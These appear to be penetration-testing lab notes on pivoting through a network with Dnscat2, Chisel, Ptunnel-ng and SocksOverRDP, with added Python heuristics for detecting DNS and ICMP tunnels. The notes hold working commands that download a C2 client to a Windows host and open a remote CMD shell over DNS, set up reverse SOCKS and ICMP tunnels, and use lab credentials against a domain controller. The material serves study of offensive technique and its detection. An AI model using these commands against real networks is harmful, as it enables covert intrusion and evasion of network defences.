Dnscat2, Chisel, Ptunnel-ng, and SocksOverRDP Tunneling Techniques
Dnscat2 Tunneling
Set Up Dnscat2 Server on the Attack Host
Clones and configures the Dnscat2 server to handle DNS-based C2 traffic.
C:\mrci0x1> git clone https://github.com/iagox86/dnscat2.git
C:\mrci0x1> cd dnscat2/server/
C:\mrci0x1> sudo gem install bundler
C:\mrci0x1> sudo bundle install
Starts the Dnscat2 server on the attack host.
C:\mrci0x1> sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
New window created: 0
dnscat2> New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.
auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 10.10.14.18:53
[domains = inlanefreight.local]...
Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):
./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local
To talk directly to the server without a domain name, run:
./dnscat --dns server=x.x.x.x,port=53 --secret=0ec04a91cd1e963f8c03ca499d589d21
Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.
Clone Dnscat2 PowerShell Client
Clones the Dnscat2 PowerShell client for execution on the Windows target.
C:\mrci0x1> git clone https://github.com/lukebaggett/dnscat2-powershell.git
Transfer the Client to the Windows Target
Transfers the Dnscat2 PowerShell client to the Ubuntu pivot host.
C:\mrci0x1> scp dnscat2-powershell/dnscat2.ps1 ubuntu@10.129.202.64:/home/ubuntu/
Hosts the client script on the Ubuntu pivot host.
C:\pivot_host> python3 -m http.server 8123
Downloads the client script to the Windows target.
C:\windows> Invoke-WebRequest -Uri "http://10.129.202.64:8123/dnscat2.ps1" -OutFile "C:\dnscat2.ps1"
Run the Dnscat2 Client on the Windows Target
Imports and executes the Dnscat2 PowerShell client to establish a CMD shell session.
C:\windows> Import-Module .\dnscat2.ps1
C:\windows> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
Confirm Session Establishment
Confirms the Dnscat2 session is established on the attack host.
C:\mrci0x1>
New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2>
Interact with the Session
Switches to the Dnscat2 session to interact with the CMD shell.
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!
To go back, type ctrl-z.
Microsoft Windows [Version 10.0.18363.1801]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
exec (OFFICEMANAGER) 1>
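Dnscat2 moves its data as long hex-encoded labels under the tunnel domain, so a resolver or port-53 capture shows one client asking for many unique, long, hex-only subdomains of a single zone (inlanefreight.local in the notes above), typically across the TXT, CNAME and MX types the tool rotates by default. The detection heuristic below is an added example, not part of the original notes or of Dnscat2; the log lines and the `client qtype qname` format are constructed for it. Note that a client started with `-DNSserver 10.10.14.18` talks to the server directly, so the same check has to run over outbound UDP/53 traffic rather than the internal resolver's log.

```python
import re
from collections import defaultdict

# Data-bearing labels: long runs of hex characters (Dnscat2's default encoding).
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")

# Constructed resolver log, one "client qtype qname" per line: three ordinary
# lookups, then a burst of hex labels under the tunnel zone used in the notes.
SAMPLE_LOG = """\
10.129.202.64 A www.example.com
10.129.202.64 A mail.example.com
10.129.202.64 AAAA www.example.com
172.16.5.19 TXT 5b7f0a9d3c1e88f2a4b61d9e0c3f7a21d4e8b.inlanefreight.local
172.16.5.19 CNAME 9f1c2e3d4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d.inlanefreight.local
172.16.5.19 MX 0a1b2c3d4e5f60718293a4b5c6d7e8f9.inlanefreight.local
172.16.5.19 TXT ffee00112233445566778899aabbccddeeff0011.inlanefreight.local
172.16.5.19 A 1234567890abcdef1234567890abcdef.inlanefreight.local
"""

def parse(log):
    """Yield (client, qtype, qname) for each well-formed log line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 3:
            yield parts[0], parts[1].upper(), parts[2].lower().rstrip(".")

def zone_of(qname):
    """Approximate the zone as the last two labels (enough for this sample)."""
    return ".".join(qname.split(".")[-2:])

def flag_tunnel_zones(log, min_unique=4, min_hex_ratio=0.75):
    """Return {(client, zone): stats} where one client asks for many unique
    subdomains of one zone and most of them are long hex labels."""
    labels, qtypes = defaultdict(set), defaultdict(set)
    for client, qtype, qname in parse(log):
        zone = zone_of(qname)
        sub = qname[: -len(zone)].rstrip(".")
        if sub:  # ignore lookups of the bare zone itself
            labels[(client, zone)].add(sub.split(".")[0])
            qtypes[(client, zone)].add(qtype)
    flagged = {}
    for key, labs in labels.items():
        hex_ratio = sum(1 for l in labs if HEX_LABEL.match(l)) / len(labs)
        if len(labs) >= min_unique and hex_ratio >= min_hex_ratio:
            flagged[key] = {
                "unique_labels": len(labs),
                "hex_ratio": hex_ratio,
                "mean_label_len": sum(map(len, labs)) / len(labs),
                "qtypes": sorted(qtypes[key]),  # Dnscat2 rotates TXT/CNAME/MX by default
            }
    return flagged
```

Tune `min_unique` to the query volume of the zone being watched; a legitimate CDN zone can also show many unique labels, but they are rarely pure hex of this length.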
Chisel Forward Tunneling
Clone Chisel
Downloads the Chisel repository to the attack host.
C:\mrci0x1> git clone https://github.com/jpillora/chisel.git
Install Go and Build Chisel
Builds the Chisel binary on the attack host.
C:\mrci0x1> cd chisel
C:\mrci0x1> go build
Transfer Chisel to the Pivot Host
Copies the Chisel binary to the Ubuntu pivot host.
C:\mrci0x1> scp chisel ubuntu@10.129.202.64:~/
ubuntu@10.129.202.64's password:
chisel 100% 11MB 1.2MB/s 00:09
Run the Chisel Server on the Pivot Host
Starts the Chisel server on the Ubuntu pivot host with SOCKS5 proxying enabled.
C:\pivot_host> ./chisel server -v -p 1234 --socks5
2022/05/05 18:16:25 server: Fingerprint Viry7WRyvJIOPveDzSI2piuIvtu9QehWw9TzA3zspac=
2022/05/05 18:16:25 server: Listening on http://0.0.0.0:1234
Run the Chisel Client on the Attack Host
Connects to the Chisel server from the attack host to create a SOCKS5 proxy.
C:\mrci0x1> ./chisel client -v 10.129.202.64:1234 socks
2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy #127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected
Configure Proxychains
Configures proxychains to route traffic through the Chisel SOCKS5 proxy.
C:\mrci0x1> tail -f /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# defaults set to "tor"
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
Connect to the Domain Controller
Establishes an RDP session to the Domain Controller through the Chisel tunnel.
C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Chisel Reverse Tunneling
Start the Chisel Server on the Attack Host
Runs the Chisel server with reverse tunneling enabled on the attack host.
C:\mrci0x1> sudo ./chisel server --reverse -v -p 1234 --socks5
2022/05/30 10:19:16 server: Reverse tunnelling enabled
2022/05/30 10:19:16 server: Fingerprint n6UFN6zV4F+MLB8WV3x25557w/gHqMRggEnn15q9xIk=
2022/05/30 10:19:16 server: Listening on http://0.0.0.0:1234
Run the Chisel Client on the Pivot Host
Connects from the Ubuntu pivot host to the attack host for reverse SOCKS proxy.
C:\pivot_host> ./chisel client -v 10.10.14.18:1234 R:socks
2022/05/30 14:19:29 client: Connecting to ws://10.10.14.18:1234
2022/05/30 14:19:29 client: Handshaking...
2022/05/30 14:19:30 client: Sending config
2022/05/30 14:19:30 client: Connected (Latency 117.204196ms)
2022/05/30 14:19:30 client: tun: SSH connected
Configure Proxychains
Ensures proxychains points at the SOCKS5 listener on 127.0.0.1:1080 that the reverse tunnel opens on the attack host.
C:\mrci0x1> tail -f /etc/proxychains.conf
[ProxyList]
# add proxy here ...
# socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
Connect to the Domain Controller
Establishes an RDP session to the Domain Controller via the reverse Chisel tunnel.
C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
Ptunnel-ng ICMP Tunneling
Clone Ptunnel-ng
Downloads the Ptunnel-ng repository to the attack host.
C:\mrci0x1> git clone https://github.com/utoni/ptunnel-ng.git
Build Ptunnel-ng
Builds the Ptunnel-ng tool on the attack host.
C:\mrci0x1> cd ptunnel-ng
C:\mrci0x1> sudo ./autogen.sh
Alternative method to build a static Ptunnel-ng binary for compatibility.
C:\mrci0x1> sudo apt install automake autoconf -y
C:\mrci0x1> cd ptunnel-ng/
C:\mrci0x1> sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
C:\mrci0x1> ./autogen.sh
Transfer Ptunnel-ng to the Pivot Host
Copies the Ptunnel-ng directory to the Ubuntu pivot host.
C:\mrci0x1> scp -r ptunnel-ng ubuntu@10.129.202.64:~/
Start the Ptunnel-ng Server on the Pivot Host
Runs the Ptunnel-ng server on the Ubuntu pivot host to forward ICMP traffic.
C:\pivot_host> cd ~/ptunnel-ng/src
C:\pivot_host> sudo ./ptunnel-ng -r10.129.202.64 -R22
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libselinux.so.1: no version information available (required by ./ptunnel-ng)
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: (c) 2017-2019 Toni Uhlig, <matzeton@googlemail.com>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.
[inf]: Dropping privileges now.
Connect to the Ptunnel-ng Server from the Attack Host
Starts the Ptunnel-ng client to connect to the server via ICMP.
C:\mrci0x1> sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
[inf]: Starting ptunnel-ng 1.42.
[inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: (c) 2017-2019 Toni Uhlig, <matzeton@googlemail.com>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Relaying packets from incoming TCP streams.
Tunnel SSH through the ICMP Tunnel
Establishes an SSH session through the ICMP tunnel.
C:\mrci0x1> ssh -p2222 -lubuntu 127.0.0.1
ubuntu@127.0.0.1's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 11 May 2022 03:10:15 PM UTC
System load: 0.0
Usage of /: 39.6% of 13.72GB
Memory usage: 37%
Swap usage: 0%
Processes: 183
Users logged in: 1
IPv4 address for ens192: 10.129.202.64
IPv6 address for ens192: dead:beef::250:56ff:feb9:52eb
IPv4 address for ens224: 172.16.5.129
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
144 updates can be applied immediately.
97 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Wed May 11 14:53:22 2022 from 10.10.14.18
ubuntu@WEB01:~$
View Tunnel Traffic Statistics
Checks Ptunnel-ng server logs for session details.
C:\pivot_host>
[inf]: Incoming tunnel request from 10.10.14.18.
[inf]: Starting new session to 10.129.202.64:22 with ID 20199
[inf]: Received session close from remote peer.
[inf]:
Session statistics:
[inf]: I/O: 0.00/ 0.00 mb ICMP I/O/R: 248/ 22/ 0 Loss: 0.0%
[inf]:
Enable Dynamic Port Forwarding
Sets up a SOCKS5 proxy over the ICMP-tunneled SSH session.
C:\mrci0x1> ssh -D 9050 -p2222 -lubuntu 127.0.0.1
ubuntu@127.0.0.1's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
<snip>
Configure Proxychains
Configures proxychains to use the SOCKS5 proxy for tunneling.
C:\mrci0x1> echo "socks5 127.0.0.1 9050" >> /etc/proxychains.conf
Verifies the proxychains configuration.
C:\mrci0x1> tail -f /etc/proxychains.conf
socks5 127.0.0.1 9050
Scan the Internal Network
Scans the Domain Controller for RDP service availability through the ICMP tunnel.
C:\mrci0x1> proxychains nmap -sV -sT 172.16.5.19 -p3389
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-11 11:10 EDT
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:80-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19:3389-<><>-OK
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
Connect to the Domain Controller
Establishes an RDP session to the Domain Controller through the ICMP tunnel.
C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
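Ptunnel-ng carries TCP stream data inside the payloads of ICMP echo requests and replies, which is why the server statistics above count 248 ICMP packets for one short SSH session. A real ping sends a fixed payload (56 bytes on Linux, 32 on Windows) about once a second; a tunnel produces a sustained stream between one host pair with payload sizes that track the TCP data. The heuristic below is an added example, not part of the original notes or of Ptunnel-ng; the ICMP records are constructed (a benign ping plus a tunnel between the two hosts from the notes).

```python
from collections import defaultdict

# Constructed ICMP records: (seconds, src, dst, icmp_type, payload_bytes),
# where type 8 is an echo request and type 0 an echo reply.
# Ordinary pings: fixed 56-byte payload (Linux default; Windows uses 32), 1/s.
NORMAL_PING = [(t, "10.129.202.64", "8.8.8.8", 8, 56) for t in range(4)] + [
    (t + 0.02, "8.8.8.8", "10.129.202.64", 0, 56) for t in range(4)
]
# Tunnel: tens of echo packets per second between one pair, payload sizes
# following the TCP data carried inside, in both directions.
TUNNEL_SIZES = [28, 1016, 92, 404, 28, 568]
TUNNEL = []
for i in range(24):
    t = 100 + i * 0.05
    TUNNEL.append((t, "10.10.14.18", "10.129.202.64", 8, TUNNEL_SIZES[i % 6]))
    TUNNEL.append((t + 0.01, "10.129.202.64", "10.10.14.18", 0, TUNNEL_SIZES[(i + 3) % 6]))
SAMPLE = NORMAL_PING + TUNNEL

def flag_icmp_tunnels(records, min_packets=20, min_pps=5.0,
                      max_normal_payload=64, min_distinct_sizes=3):
    """Return {(host_a, host_b): stats} for echo conversations that look like a
    tunnel: a sustained packet rate plus payload sizes a real ping would not use."""
    convs = defaultdict(list)
    for ts, src, dst, icmp_type, size in records:
        if icmp_type in (0, 8):  # echo request/reply only; one key per host pair
            convs[tuple(sorted((src, dst)))].append((ts, size))
    flagged = {}
    for pair, pkts in convs.items():
        pkts.sort()
        sizes = [s for _, s in pkts]
        duration = max(pkts[-1][0] - pkts[0][0], 1e-9)
        pps = len(pkts) / duration
        odd_sizes = len(set(sizes)) >= min_distinct_sizes or max(sizes) > max_normal_payload
        if len(pkts) >= min_packets and pps >= min_pps and odd_sizes:
            flagged[pair] = {
                "packets": len(pkts),
                "pps": round(pps, 1),
                "distinct_sizes": len(set(sizes)),
                "max_payload": max(sizes),
            }
    return flagged
```

Where ICMP is not needed between workstations and servers, blocking or rate-limiting echo at the segment boundary removes the channel entirely; where it is, these statistics can be computed per host pair from flow records or a packet capture.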
SocksOverRDP Tunneling
Connect to the Foothold Host
Establishes an RDP session to the compromised Windows foothold host.
C:\mrci0x1> xfreerdp /v:10.129.x.x /u:htb-student /p:<password>
Load SocksOverRDP Plugin on the Foothold Host
Registers the SocksOverRDP plugin DLL on the foothold host.
C:\windows> regsvr32 SocksOverRDP-Plugin.dll
Connect to the Domain Controller via RDP
Starts an RDP session to the Domain Controller from the foothold host.
C:\windows> mstsc.exe /v:172.16.5.19
Start SocksOverRDP Server on the Domain Controller
Runs the SocksOverRDP server on the Domain Controller.
C:\windows> C:\Path\To\SocksOverRDP-Server.exe
Verify the SOCKS Listener on the Foothold Host
Checks for the active SOCKS proxy listener on the foothold host.
C:\windows> netstat -antb | findstr 1080
TCP 127.0.0.1:1080 0.0.0.0:0 LISTENING
Pivot to the Internal Target
Initiates an RDP session to the internal target from the foothold host.
C:\windows> mstsc.exe /v:172.16.6.155